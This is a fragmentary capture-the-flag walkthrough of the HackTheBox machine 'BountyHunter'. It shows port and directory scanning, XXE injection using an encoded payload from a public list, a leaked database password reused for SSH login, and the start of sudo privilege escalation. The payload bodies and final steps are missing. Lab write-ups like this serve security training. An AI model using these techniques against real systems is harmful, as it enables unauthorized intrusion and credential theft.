HackTheBox – BountyHunter
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.100
┌──(rootkali)-[/home/kali/Downloads]
└─# dirb http://10.10.11.100/
http://10.10.11.100/resources/
http://10.10.11.100/resources/README.txt
┌──(rootkali)-[/home/kali/Downloads]
└─# dirb http://10.10.11.100/ -X .php
http://10.10.11.100/portal.php
Since it is a hash, you need to decode it first.
Let’s decode it first as Url and then as Base64.
https://ostermiller.org/calc/encode.html
https://github.com/payloadbox/xxe-injection-payload-list
Let’s change the payload we find according to ourselves.
Modified content:
And let’s hash again for system recognition.
First Base64 encode the next Url.
Username: development
Let’s check the contents of the .php document we found earlier.
To do this, select the appropriate payload
$dbusername = “admin”;
$dbpassword = “m19RoAU0hP41A1sTsq6K”;
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh development@10.10.11.100
Password: m19RoAU0hP41A1sTsq6K
development@bountyhunter:~$ sudo –l
development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
development@bountyhunter:~$ cd /tmp
development@bountyhunter:/tmp$ cat test.md
development@bountyhunter:/tmp$ chmod 777 test.md